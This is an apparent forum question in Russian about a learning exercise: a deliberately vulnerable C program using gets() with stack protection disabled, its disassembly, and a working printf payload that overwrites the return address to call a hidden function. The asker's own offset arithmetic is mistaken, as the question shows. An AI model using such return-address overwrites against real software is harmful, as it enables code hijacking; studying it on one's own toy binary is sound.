Я пытаюсь взять контроль над переполнением стека. Во-первых, вот пример кода C, который я скомпилировал на x32 VM Linux (gcc -fno-stack-protector -ggdb -o first first.c
),
#include "stdio.h"
int CanNeverExecute()
{
printf("I can never execute\n");
return(0);
}
void GetInput()
{
char buffer[8];
gets(buffer);
puts(buffer);
}
int main()
{
GetInput();
return(0);
}
Затем отладчик (intel flavor): дамп ассемблерного кода для функции GetInput
:
0x08048455 <+0>: push ebp
0x08048456 <+1>: mov ebp,esp
0x08048458 <+3>: sub esp,0x28
0x0804845b <+6>: lea eax,[ebp-0x10]
Здесь мы видим, что sub esp, 0x28 резервирует 40 байтов для буферной переменной (справа?).
Функция CanNeverExecute
находится в адресе 0x0804843c
.
Итак, чтобы запустить функцию CanNeverExecute
, мне нужно поместить 40 байтов в буферную переменную, затем будет 8 байтов для сохраненного базового указателя, а затем 8 байтов возвращаемого указателя, который я хочу изменить.
Итак, мне нужна строка из 48 символов ASCII плюс \x3c\x84\x04\x08
в конце (адрес функции CanNeverExecute
). Это теоретически. Но на практике мне нужно всего 20 байтов перед адресом возвращаемого указателя:
~/hacktest $ printf "12345678901234567890\x3c\x84\x04\x08" | ./first
12345678901234567890..
I can never execute
Illegal instruction (core dumped)
Зачем ему нужно только 20 байтов вместо 48? Где моя ошибка?